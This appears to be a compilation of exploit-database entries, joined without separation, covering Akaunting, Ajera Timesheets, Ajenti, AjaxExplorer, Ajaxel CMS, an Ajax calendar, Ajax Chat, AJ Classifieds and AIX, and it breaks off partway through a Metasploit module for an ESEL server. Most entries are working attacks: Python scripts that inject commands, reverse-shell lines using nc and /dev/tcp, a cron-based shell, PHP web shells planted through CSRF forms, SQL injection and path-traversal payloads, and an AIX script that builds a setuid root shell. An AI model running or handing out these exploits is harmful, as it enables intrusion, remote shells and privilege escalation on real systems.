1 ) Login with admin cred and go to :Settings > Taxes > New Tax
https://127.0.0.1/Akaunting/1/settings/taxes/1/edit
2 ) Write SSTI payload : {{7*7}} Name field , write Sale and Purchase Price random numbers
3 ) Save it
4 ) You will see the result:
49
> {{'a'.toUpperCase()}}
> A
> {{'a'.concat('b')}}
> ab
====================================================================================
1 ) Login with admin cred and go to : Banking > Transactions > New Income
https://127.0.0.1/Akaunting/1/banking/transactions/create?type=income
2 ) Write SSTI payload : {{7*7}} Description field
3 ) Save it
4 ) You will see the result:
49
> {{'a'.toUpperCase()}}
> A
> {{'a'.concat('b')}}
> ab
=======================================================================================
1 ) Login with admin cred
https://127.0.0.1/Akaunting/1/purchases/vendors/1/edit
2 ) Write SSTI payload : {{7*7}} Name field
3 ) Save it
4 ) You will see the result:
49
> {{'a'.toUpperCase()}}
> A
> {{'a'.concat('b')}}
> ab
# Exploit Title: Akaunting < 3.1.3 - RCE
# Date: 08/02/2024
# Exploit Author: u32i@proton.me
# Vendor Homepage: https://akaunting.com
# Software Link: https://github.com/akaunting/akaunting
# Version: <= 3.1.3
# Tested on: Ubuntu (22.04)
# CVE : CVE-2024-22836
#!/usr/bin/python3
import sys
import re
import requests
import argparse
def get_company():
    """Derive the company id from the redirect issued for the site root.

    Relies on the module-level ``target``, ``headers`` and ``cookies``.
    Terminates with exit status 3 when the root does not answer with a
    302, and with status 7 when the redirect points at the login page
    (the session cookie is not accepted).
    """
    root = requests.get(target, headers=headers, cookies=cookies, allow_redirects=False)
    redirected = root.status_code == 302
    if not redirected:
        print("[ERR] No company id was found!")
        sys.exit(3)
    # The last path segment of the Location header is the company id.
    _, _, last_segment = root.headers['Location'].rpartition('/')
    if last_segment == "login":
        print("[ERR] Invalid session cookie!")
        sys.exit(7)
    return last_segment
def get_tokens(url):
    """Fetch *url* and pull out the CSRF token and the session cookie.

    Args:
        url: page whose HTML embeds a ``"csrfToken":"..."`` literal.

    Returns:
        dict with keys ``csrf_token`` (str) and ``session`` (the
        ``akaunting_session`` cookie value, or None when absent).

    Exits with status 1 when no token literal is found in the body.
    Uses the module-level ``headers`` and ``cookies``.
    """
    page = requests.get(url, headers=headers, cookies=cookies, allow_redirects=False)
    token_match = re.search(r"\"csrfToken\"\:\".*\"", page.text)
    if token_match is None:
        print("[ERR] Couldn't get csrf token")
        sys.exit(1)
    # Everything after the last ':' of the match, with the quotes stripped.
    raw_token = token_match.group().split(':')[-1]
    return {
        'csrf_token': raw_token.replace('"', ''),
        'session': page.cookies.get('akaunting_session'),
    }
def inject_command(cmd):
    """Submit the company wizard request with *cmd* appended to ``locale``.

    The ``locale`` value is sent as ``"en_US && <cmd>"``; this is the
    injection point of CVE-2024-22836 as exercised by this script. Per the
    author's flow (see main()), execution is triggered afterwards by
    trigger_rce(). Uses the module-level ``target``, ``company_id``,
    ``headers`` and ``cookies`` and updates ``headers`` in place with the
    fetched CSRF token.

    Exits with status 4 when the server answers 200 with ``error`` set.
    Note: only the 200 branch is inspected, so any non-200 answer falls
    through to the success message.
    """
    url = f"{target}/{company_id}/wizard/companies"
    tokens = get_tokens(url)
    headers.update({"X-Csrf-Token": tokens['csrf_token']})
    data = {"_token": tokens['csrf_token'], "_method": "POST", "_prefix": "company", "locale": f"en_US && {cmd}"}
    res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False)
    if res.status_code == 200:
        res_data = res.json()
        if res_data['error']:
            print("[ERR] Command injection failed!")
            sys.exit(4)
    print("[INF] Command injected!")
def trigger_rce(app, version = "1.0.0"):
    """Second step of main(): POST an app-install request for *app*.

    Args:
        app: app alias, sent as ``alias`` and embedded in ``path``.
        version: version string sent as ``version`` (default "1.0.0";
            main() passes the ``--version`` option instead).

    Exits with status 6 when a 200 reply carries an ``error`` whose message
    contains an ``Exit Code:`` fragment, and with status 5 for any other
    200-with-error reply. Non-200 replies are not inspected and fall
    through to the success message. Adds a JSON Content-Type to the
    module-level ``headers`` in place; uses ``target``, ``company_id`` and
    ``cookies``.
    """
    print("[INF] Executing the command...")
    url = f"{target}/{company_id}/apps/install"
    data = {"alias": app, "version": version, "path": f"apps/{app}/download"}
    headers.update({"Content-Type":"application/json"})
    res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False)
    if res.status_code == 200:
        res_data = res.json()
        if res_data['error']:
            # An "Exit Code:" fragment in the HTML message means the server
            # ran something and it failed; otherwise the install itself failed.
            search_res = re.search(r">Exit Code\:.*<", res_data['message'])
            if search_res:
                print("[ERR] Failed to execute the command")
                sys.exit(6)
            print("[ERR] Failed to install the app! no command was executed!")
            sys.exit(5)
    print("[INF] Executed successfully!")
def login(email, password):
    """Authenticate against ``<target>/auth/login`` and store the session.

    Args:
        email: account e-mail posted as ``email``.
        password: account password posted as ``password``.

    Side effects: refreshes the module-level ``cookies`` with the
    ``akaunting_session`` value, first from the token fetch and then from
    the login response. Exits with status 8 when the JSON reply carries a
    truthy ``error``.
    """
    login_url = f"{target}/auth/login"
    csrf = get_tokens(login_url)
    cookies.update({'akaunting_session': csrf['session']})
    form = {
        "_token": csrf['csrf_token'],
        "_method": "POST",
        "email": email,
        "password": password,
    }
    reply = requests.post(login_url, headers=headers, cookies=cookies, data=form)
    if reply.json()['error']:
        print("[ERR] Failed to log in!")
        sys.exit(8)
    print("[INF] Logged in")
    cookies.update({'akaunting_session': reply.cookies.get('akaunting_session')})
def main():
    """Run the two-step flow: inject the command, then trigger its execution.

    Reads the parsed command line from the module-level ``args``.
    """
    inject_command(args.command)
    trigger_rce(args.alias, args.version)
if __name__=='__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="target url")
    parser.add_argument("--email", help="user login email.")
    parser.add_argument("--password", help="user login password.")
    parser.add_argument("-i", "--id", type=int, help="company id (optional).")
    parser.add_argument("-c", "--command", help="command to execute.")
    parser.add_argument("-a", "--alias", help="app alias, default: paypal-standard", default="paypal-standard")
    parser.add_argument("-av", "--version", help="app version, default: 3.0.2", default="3.0.2")
    args = parser.parse_args()
    # Fixed desktop-browser User-Agent sent with every request; the helpers
    # below mutate this dict in place (CSRF token, Content-Type).
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"}
    cookies = {}
    target = args.url
    try:
        # Valid credentials are required: this is post-authentication abuse.
        login(args.email, args.password)
        # An explicit --id wins; otherwise derive it from the post-login redirect.
        company_id = get_company() if not args.id else args.id
        main()
    except:
        # NOTE(review): a bare except also catches SystemExit, so every
        # sys.exit(N) raised by the helpers above collapses to exit status 0
        # and network errors are silenced entirely; `except Exception` with
        # the error printed would keep the exit codes meaningful.
        sys.exit(0)
# Exploit Title: Ajera Timesheets <= 9.10.16 - Deserialization of untrusted data
# Date: 2019-01-03
# Exploit Author: Anthony Cole
# Vendor Homepage: https://www.deltek.com/en/products/project-erp/ajera
# Version: <= 9.10.16
# Contact: http://twitter.com/acole76
# Website: http://twitter.com/acole76
# Tested on: Windows 2012
# CVE: CVE-2018-20221
# Category: webapps
#
# Ajera is software written in .NET by Deltek. Versions <= 9.10.16 allow an attacker to cause the software to deserialize untrusted data, which can result in remote code execution.
# Secure/SAService.rem in Deltek Ajera Timesheets <= 9.10.16 is vulnerable to remote code execution via deserialization of untrusted user input from an authenticated user. The executed code runs as the IIS Application Pool that is running the application.
#
import struct, sys, requests, zlib, argparse, urlparse, subprocess
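def run_command(command):
    """Run *command* and return everything it wrote to stdout and stderr.

    Args:
        command: program to run, passed straight to ``subprocess.Popen``
            (a list of arguments, or a string on platforms where Popen
            accepts one). No shell is involved.

    Returns:
        bytes: the combined stdout/stderr output, unmodified.

    Raises:
        OSError: when the program cannot be started.
    """
    proc = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    # Read until EOF, then reap the child so it does not linger as a zombie
    # (the original never waited on it) and the pipe handle is released.
    try:
        output = b''.join(iter(proc.stdout.readline, b''))
    finally:
        proc.stdout.close()
        proc.wait()
    return output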
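def isurl(urlstr):
    """argparse type check: accept *urlstr* only if it has a scheme and a host.

    ``urlparse.urlparse`` does not raise on malformed input, so the original
    try/except never rejected anything; checking for a non-empty scheme and
    netloc makes ``--url``/``--proxy`` actually validate.

    Args:
        urlstr: the raw command-line value.

    Returns:
        str: *urlstr* unchanged when it parses as ``scheme://host[...]``.

    Raises:
        argparse.ArgumentTypeError: when the value lacks a scheme or host.
    """
    try:
        parts = urlparse.urlparse(urlstr)
    except ValueError:
        raise argparse.ArgumentTypeError("invalid url")
    if not (parts.scheme and parts.netloc):
        raise argparse.ArgumentTypeError("invalid url")
    return urlstr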
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Ajera .NET Remoting Exlpoit')
    parser.add_argument("--url", "-u", type=isurl, required=True, help="the url of the target.")
    parser.add_argument("--cmd", "-c", required=True, help="the command to execute")
    parser.add_argument("--auth", "-a", required=True, help="the ASPXAUTH cookie")
    parser.add_argument("--version", "-v", required=False, help="the version of Ajera Server. 8.9.9.0 => 8990", default="8990")
    parser.add_argument("--ysoserial", "-y", required=True, help="the path to ysoserial.exe")
    parser.add_argument("--proxy", "-p", type=isurl, required=False, help="ex: http://127.0.0.1:8080")
    args = parser.parse_args()
    # Only scheme and host of --url are kept; any path given is discarded.
    url_parts = urlparse.urlparse(args.url)
    target_url = "%s://%s" % (url_parts.scheme, url_parts.netloc)
    proxies = {}
    if(args.proxy != None):
        proxy_parts = urlparse.urlparse(args.proxy)
        proxies[proxy_parts.scheme] = "%s://%s" % (proxy_parts.scheme, proxy_parts.netloc)
    # NOTE(review): `cmd` and `size` are computed but never used below.
    cmd = "/c " + args.cmd
    size = len(cmd)
    # args.cmd is interpolated into one command string handed to run_command();
    # a double quote inside it would break the quoting.
    serial_payload = run_command('%s -o raw -g TypeConfuseDelegate -f BinaryFormatter -c "%s"' % (args.ysoserial, args.cmd))
    url = target_url + "/ajera/Secure/SAService.rem"
    headers = {'Content-Type': 'application/octet-stream'}
    # An authenticated session is required: the .ASPXAUTH cookie is mandatory.
    cookies = {'.ASPXAUTH': args.auth}
    # Body layout: one 0x04 byte, the version string, then the zlib-compressed
    # serialized blob (Python 2 str concatenation). On the wire this is an
    # octet-stream POST to SAService.rem carrying a zlib stream.
    payload = "\x04" + args.version + zlib.compress(serial_payload)
    # verify=False disables TLS certificate validation for this request; the
    # response is never inspected, so neither success nor failure is reported.
    response = requests.post(url, headers=headers, cookies=cookies, data=payload, proxies=proxies, verify=False)
# Title: AjentiCP 1.2.23.13 - Cross-Site Scripting
# Author: Numan OZDEMIR (https://infinitumit.com.tr)
# Vendor Homepage: ajenti.org
# Software Link: https://github.com/ajenti/ajenti
# Version: Up to v1.2.23.13
# CVE: CVE-2018-18548
# Description:
# An attacker can inject JavaScript code without Ajenti privileges through this
# vulnerability.
# Normally an attacker cannot interact with Ajenti without Ajenti privileges.
# But with this vulnerability, if the attacker can create a folder (for example
# through a web application vulnerability), they can run
# malicious JavaScript code in the Ajenti user's browser while that user
# is using the File Manager tool.
# So this vulnerability poses a high risk.
# How to Reproduce:
1)- Create a directory as named xss payload. Like, im<img src onerror=alert(1337)>dir
2)- Open this directory in File Manager tool in Ajenti server admin panel.
#!/usr/bin/python3
import requests
import sys
import warnings
from bs4 import BeautifulSoup
import json
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
if len(sys.argv) < 6:
    print("Usage: ./exploit.py http(s)://url username password listenerIP listenerPort")
    exit()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]
# One session so the cookie from the login call is reused for the second request.
req = requests.session()
login_creds = {
    "username":username,
    "password":password,
    "mode":"normal"}
print("[+] Sendin login request...")
# Authenticates with real credentials: this is post-authentication abuse of the
# terminal API, not an authentication bypass.
login = req.post(url+"/api/core/auth", json = login_creds)
# Success heuristic: the username appears somewhere in the response body.
if username in login.text:
    page = url + "/api/terminal/create"
    payload = {
        'command':'nc -e /bin/sh ' + ip + ' ' + port ,
        'autoclose':True
    }
    # Serialized by hand and posted as the raw body; no JSON Content-Type is
    # set, so the server presumably parses the body regardless (not verified
    # here). The response is not inspected.
    payload = json.dumps(payload)
    print("[+] Sending payload...")
    send_payload = req.post(page, payload)
    print("[+] Check your listener !...")
else:
    print("[-] Wrong credentials or may the system patched.")
    exit()
# Title: Ajenti 2.1.31 - Remote Code Execution
# Author: Jeremy Brown
# Date: 2019-10-13
# Software Link: https://github.com/ajenti/ajenti
# CVE: N/A
# Tested on: Ubuntu Linux
#!/usr/bin/python
# ajentix.py
#
# Ajenti Remote Command Execution Exploit
#
# -------
# Details
# -------
#
# Ajenti is a web control panel written in Python and AngularJS.
#
# One can locally monitor executed commands on the server while testing
#
# $ sudo ./exec-notify (google for "exec-notify.c", modify output as needed)
# sending proc connector: PROC_CN_MCAST_LISTEN... sent
# Reading process events from proc connector.
# Hit Ctrl-C to exit
#
# Browse over to https://server:8000/view/login/normal to login
#
# .....
# pid=9889 executed [/bin/sh -c /bin/su -c "/bin/echo SUCCESS" - test ]
# pid=9889 executed [/bin/su -c /bin/echo SUCCESS - test ]
#
# Modified the JSON request username value to be `id`
#
# pid=7514 executed [/bin/sh -c /bin/su -c "/bin/echo SUCCESS" - `id` ]
# pid=7516 executed [id ]
# pid=7514 executed [/bin/su -c /bin/echo SUCCESS - uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) ]
#
# *ACK.....*
#
# Also the login routine times out after 5 seconds (see auth.py), which
# makes an interactive shell relatively ephemeral. So, we cron job.
#
# $ python3 ajentix.py server.ip shell local-listener.ip
# Done!
#
# $ nc -v -l -p 5555
# Listening on [0.0.0.0] (family 0, port 5555)
# Connection from server.domain 41792 received!
# bash: cannot set terminal process group (18628): Inappropriate ioctl for device
# bash: no job control in this shell
# nobody@server:/var/spool/cron$ ps
# PID TTY TIME CMD
# 6386 ? 00:00:00 /usr/local/bin/ <-- ajenti-panel worker
# 18849 ? 00:00:00 sh
# 18851 ? 00:00:00 bash
# 18859 ? 00:00:00 ps
#
#
# Tested Ajenti 2.1.31 on Ubuntu 18.04, fixed in 2.1.32
#
# Fix commit: https://github.com/ajenti/ajenti/commit/7aa146b724e0e20cfee2c71ca78fafbf53a8767c
#
#
import os
import sys
import ssl
import json
import urllib.request as request
def main():
    """Send one crafted login request to https://<host>:8000/api/core/auth.

    argv: ``<host>`` followed by either a command string or ``shell <ip>``.
    The chosen text is placed in the ``username`` field wrapped in
    backticks, which is the injection point described in the header above.
    Nothing is read back from the server; "Done!" only means the request
    was sent.
    """
    if(len(sys.argv) < 2):
        print("Usage: %s <host> [\"cmd\" or shell...ip]\n" % sys.argv[0])
        print("Eg: %s 1.2.3.4 \"id\"" % sys.argv[0])
        print("... %s 1.2.3.4 shell 5.6.7.8\n" % sys.argv[0])
        return
    host = sys.argv[1]
    # NOTE(review): argv[2] is read unconditionally, so `ajentix.py <host>`
    # alone raises IndexError instead of printing the usage text.
    cmd = sys.argv[2]
    if(cmd == 'shell'):
        if(len(sys.argv) < 4):
            print("Error: need ip to connect back to for shell")
            return
        ip = sys.argv[3]
        # 'shell' mode installs a crontab entry; the header explains why cron
        # is used (the login routine times out after 5 seconds).
        shell = "`echo \"* * * * * bash -i >& /dev/tcp/" + ip + "/5555 0>&1\" > /tmp/cronx; crontab /tmp/cronx`"
        username = shell
    else:
        username = "`" + cmd + "`"
    body = json.dumps({'username':username, 'password':'test', 'mode':'normal'})
    byte = body.encode('utf-8')
    url = "https://" + host + ":8000" + "/api/core/auth"
    try:
        req = request.Request(url)
        req.add_header('Content-Type', 'application/json; charset=utf-8')
        req.add_header('Content-Length', len(byte))
        # Certificate validation is disabled via the unverified SSL context.
        request.urlopen(req, byte, context=ssl._create_unverified_context()) # ignore the cert
    except Exception as error:
        print("Error: %s" % error)
        return
    print("Done!")
if(__name__ == '__main__'):
    # Script entry point; main() does its own argument validation.
    main()
# Exploit Title: Ajenti 2.1.31 - Remote Code Exection (Metasploit)
# Date: 2019-10-29
# Exploit Author: Onur ER
# Vendor Homepage: http://ajenti.org/
# Software Link: https://github.com/ajenti/ajenti
# Version: 2.1.31
# Tested on: Ubuntu 19.10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit module for the Ajenti 2.1.31 command injection in the
# `username` field of POST /api/core/auth (the same bug ajentix.py above
# exercises by hand). The issue is fixed in Ajenti 2.1.32.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => "Ajenti 2.1.31 Remote Code Execution",
      'Description' => %q{
This module exploits a command injection in Ajenti <= 2.1.31.
By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned.
      },
      'Author' => [
        'Jeremy Brown', # Vulnerability discovery
        'Onur ER <onur@onurer.net>' # Metasploit module
      ],
      'References' => [
        ['EDB', '47497']
      ],
      'DisclosureDate' => '2019-10-14',
      'License' => MSF_LICENSE,
      'Platform' => 'python',
      'Arch' => ARCH_PYTHON,
      'Privileged' => false,
      'Targets' => [
        [ 'Ajenti <= 2.1.31', {} ]
      ],
      # Ajenti's panel defaults: TLS on port 8000.
      'DefaultOptions' =>
      {
        'RPORT' => 8000,
        'SSL' => 'True',
        'payload' => 'python/meterpreter/reverse_tcp'
      },
      'DefaultTarget' => 0
    ))
    register_options([
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  # Fingerprint the login page: an exact `'ajentiVersion', '2.1.31'` marker
  # yields Vulnerable, any other page mentioning Ajenti only Detected.
  # Note that the error text below is also reached on a non-200 reply, not
  # only on a timeout.
  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => "/view/login/normal"
    })
    if res and res.code == 200
      if res.body =~ /'ajentiVersion', '2.1.31'/
        return Exploit::CheckCode::Vulnerable
      elsif res.body =~ /Ajenti/
        return Exploit::CheckCode::Detected
      end
    end
    vprint_error("Unable to determine due to a HTTP connection timeout")
    return Exploit::CheckCode::Unknown
  end

  # Send the encoded Python payload, wrapped in backticks, as the username of
  # a normal-mode login; the password is random filler. The HTTP response is
  # not inspected.
  def exploit
    print_status("Exploiting...")
    random_password = rand_text_alpha_lower(7)
    json_body = { 'username' => "`python -c \"#{payload.encoded}\"`",
                  'password' => random_password,
                  'mode' => 'normal'
    }
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri, 'api', 'core', 'auth'),
      'ctype' => 'application/json',
      'data' => JSON.generate(json_body)
    })
  end
end
source: https://www.securityfocus.com/bid/53659/info
Ajaxmint Gallery is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker can exploit this vulnerability to view files and to execute local scripts in the context of the webserver process. This may aid in further attacks.
Ajaxmint Gallery 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/learn/ajaxmint/ajaxmint-gallery/admin/index.php?c=..\..\..\..\ajaxmint-gallery/pictures/5_me.jpg%00 [aka shell]
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AJAXEXPLORER-REMOTE-CMD-EXECUTION.txt
[+] ISR: apparitionsec
Vendor:
==========
sourceforge.net
smsid
download link:
sourceforge.net/projects/ajax-explorer/files/
Product:
=======================
AjaxExplorer v1.10.3.2
Manage server files through a simple windows-like interface.
Vulnerability Type:
=======================
Remote Command Execution
CSRF
Persistent XSS
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
AjaxExplorer has a command terminal feature where you can move, copy, delete
files, etc. It also lets a user save commands in a
flat file named "terminal" under their user profile
"/ae.user/owner/myprofile".
e.g.
copy [FILEPATH + FILENAME] [FILEPATH]
create [FILEPATH + FILENAME]
Since AjaxExplorer also suffers from a CSRF vulnerability, we can exploit the
application by first creating an .htaccess file with an
"allow from all" directive to bypass access restrictions, and then creating
arbitrary PHP files for remote command execution.
This exploit will require two consecutive HTTP requests, so we need to
target an iframe to stay on same page until exploit is completed.
Exploit code(s):
===============
1) first POST request creates .htaccess file so we can bypass directory
browsing restrictions.
2) second POST writes our remote command execution file we will then access
to execute commands on the victim system.
The below P:/ for "strPath" form value is for "Profile"
<iframe name="PWNED" style="display:none" name="hidden-form"></iframe>
<form target="PWNED" id="htaccess" action="
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php"
method="post">
<input type="hidden" name="strPage" value="control/file/editor" >
<input type="hidden" name="strPath" value="P:/" >
<input type="hidden" name="strFile" value=".htaccess" >
<input type="hidden" name="strText" value='allow from all' >
<script>document.getElementById('htaccess').submit()</script>
</form>
<form target="PWNED" id="RCE" action="
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php"
method="post">
<input type="hidden" name="strPage" value="control/file/editor" >
<input type="hidden" name="strPath" value="P:/" >
<input type="hidden" name="strFile" value="terminal.php" >
<input type="hidden" name="strText" value='<?php exec($_GET["cmd"]);?>' >
<script>document.getElementById('RCE').submit()</script>
</form>
Now we can access and run arbitrary cmds.
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/ae.user/owner/myprofile/terminal.php?cmd=c
:\\Windows\\system32\\calc.exe
/////////////////////////////////////////////////////
Here is another way to RCE this application... first create PHP file then
edit.
<iframe name="DOOM" style="display:none" name="hidden-form"></iframe>
<form target="DOOM" id="CSRF2" method="post" action="
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php">
<input type="hidden" name="strPage" value="control/file/editor" />
<input type="hidden" name="strPath" value="D:/" />
<input type="hidden" name="strFile" value="PWNED.php" />
<input type="hidden" name="strText"
value="<?php%20exec($_GET['cmd']);%20?>" />
</form>
<form target="DOOM" id="CSRF1" method="post" action="
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php">
<input type="hidden" name="strPage" value="control/file/create" />
<input type="hidden" name="strPath" value="D:/" />
<input type="hidden" name="strFile" value="D:/PWNED.php" />
<script>
document.getElementById('CSRF1').submit()
document.getElementById('CSRF2').submit()
</script>
</form>
////////////////////////
Persistent XSS:
================
We can also write persistent XSS payload to the user profile "terminal"
file.
<form id="XSS" method="post" action="
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php">
<input type="hidden" name="strPage" value="control/file/editor" />
<input type="hidden" name="strPath" value="P:/" />
<input type="hidden" name="strFile" value="terminal" />
<input type="hidden" name="strText" value="<script>alert(666)</script>" />
<script>document.getElementById('XSS').submit()</script>
</form>
Disclosure Timeline:
===============================
Vendor Notification: NA
June 1, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
8.0 (High)
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
Ajaxel CMS 8.0 Multiple Vulnerabilities
Vendor: Ajaxel
Product web page: http://www.ajaxel.com
Affected version: 8.0 and below
Summary: Ajaxel CMS is a very simple ajaxified CMS and framework
for any project's needs.
Desc: Ajaxel CMS version 8.0 and below suffers from multiple
vulnerabilities including LFI, XSS, SQL injection and remote
code execution via CSRF.
Tested on: Apache 2.4.10
MySQL 5.5.46
Vendor status:
[13.04.2016] Vulnerabilities discovered.
[14.04.2016] Vendor contacted.
[18.04.2016] Vendor releases patch for version 8.0 to address these issues.
[05.05.2016] Public security advisory released.
Vulnerability discovered by Krzysztof 'DizzyDuck' Kosinski
[dizzyduck_at_zeroscience.mk]
1. Reflected XSS:
-----------------
GET /cmsj9bwp'-alert(1)-'xvjry=mods/ HTTP/1.1
Host: 192.168.10.5
HTTP/1.0 404 Not Found
...
...var Conf={LANG:'en', TPL:'default', DEVICE:'pc', SESSION_LIFETIME:7200,
USER_ID:1, URL_EXT:'', HTTP_EXT:'/', FTP_EXT:'/',
REFERER:'/cmsj9bwp'-alert(1)-'xvjry=mods', VERSION:8.0,
URL_KEY_ADMIN:'cms',...
2. SQL Injection:
-----------------
http://192.168.10.5/cms=mods/tab=ai?mods_ai_tab_ai-submitted=1&f=<SQLi>
3. Local File Disclosure:
-------------------------
http://192.168.10.5/?window&cms=templates&popup=1&file_folder=cms&folder=&file=../../../../../../../../../../../../etc/passwd
4. Cross-Site Request Forgery - RCE PoC:
----------------------------------------
<html>
<body>
<form action="http://192.168.10.5/cms=settings_eval_tab/tab=eval/load"
method="POST">
<input type="hidden" name="data[eval]"
value="phpinfo();" />
<input type="hidden" name="a" value="eval" />
<input type="hidden"
name="settings_eval_tab_eval-submitted" value="1" />
<input type="submit" value="Execute" />
</form>
</body>
</html>
# Exploit Title: Ajax Full Featured Calendar 2.0 - 'search' SQL Injection
# Dork: N/A
# Date: 25.05.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/ajax-full-featured-calendar-2/10158465
# Version: 2.0
# Category: Webapps
# Tested on: Kali linux
# Description : The vulnerability allows an attacker to inject SQL commands through the 'search' parameter of the search section.
====================================================
# Demo : http://pauloreg.com/d/affc2/index.php
# PoC : SQLi :
POST /d/affc2/includes/loader.php HTTP/1.1
Host: test.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://test.com/d/affc2/index.php
Content-Length: 11
Cookie: PHPSESSID=pt848bokjvads6c9kvgs1nu973
Connection: keep-alive
search=test
Parameter: search (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: search=test%' AND SLEEP(5) AND '%'='
====================================================
source: https://www.securityfocus.com/bid/47953/info
Ajax Chat is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Ajax Chat 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/ajax-chat/ajax-chat.php?chat_path=%27%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
source: https://www.securityfocus.com/bid/48702/info
AJ Classifieds is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/demo/ajclassifieds/classifiedsauto/index.php?do=detaillisting&listingid=77â??a
#!/bin/sh
#
# Exploit Title: AIX 7.1 lquerylv privilege escalation
# Date: 2015.10.30
# Exploit Author: S2 Crew [Hungary]
# Vendor Homepage: www.ibm.com
# Software Link: -
# Version: -
# Tested on: AIX 7.1 (7100-02-03-1334)
# CVE : CVE-2014-8904
#
# From file writing to command execution ;)
#
# Step 1: with the lquerylv debug switch set and umask 0, run the setuid
# binary while /tmp/DEBUGCMD is a symlink to /etc/suid_profile. Presumably
# the binary creates its debug file through the link, leaving the profile
# world-writable (the write itself is not visible in this script).
export _DBGCMD_LQUERYLV=1
umask 0
ln -s /etc/suid_profile /tmp/DEBUGCMD
/usr/sbin/lquerylv
# Step 2: replace the profile contents; the setuid program run afterwards
# sources it (uid != euid), so these lines execute with its privileges.
# Mitigation: the IBM fix for CVE-2014-8904 referenced in the header.
cat << EOF >/etc/suid_profile
cp /bin/ksh /tmp/r00tshell
/usr/bin/syscall setreuid 0 0
chown root:system /tmp/r00tshell
chmod 6755 /tmp/r00tshell
EOF
/opt/IBMinvscout/bin/invscoutClient_VPD_Survey # suid_profile because uid!=euid
/tmp/r00tshell
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit module for CVE-2019-10123: an unauthenticated SQL injection in
# the login handshake of the AIS logistics "ESEL" server (TCP 5099, no TLS),
# used to reach xp_cmdshell on the backing MSSQL instance and stage a payload.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::MSSQL_COMMANDS
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'AIS logistics ESEL-Server Unauth SQL Injection RCE',
      'Description' => %q{
This module will execute an arbitrary payload on an "ESEL" server used by the
AIS logistic software. The server typically listens on port 5099 without TLS.
There could also be server listening on 5100 with TLS but the port 5099 is
usually always open.
The login process is vulnerable to an SQL Injection. Usually a MSSQL Server
with the 'sa' user is in place.
This module was verified on version 67 but it should also run on lower versions.
An fixed version was created by AIS in September 2017. However most systems
have not been updated.
In regard to the payload, unless there is a closed port in the web server,
you dont want to use any "bind" payload. You want a "reverse" payload,
probably to your port 80 or to any other outbound port allowed on the firewall.
Currently, one delivery method is supported
This method takes advantage of the Command Stager subsystem. This allows using
various techniques, such as using a TFTP server, to send the executable. By default
the Command Stager uses 'wcsript.exe' to generate the executable on the target.
NOTE: This module will leave a payload executable on the target system when the
attack is finished.
      },
      'Author' =>
        [
          'Manuel Feifel'
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['CVE', '2019-10123'],
        ],
      'Platform' => 'win',
      'Arch' => [ ARCH_X86, ARCH_X64 ],
      'Payload' =>
        {
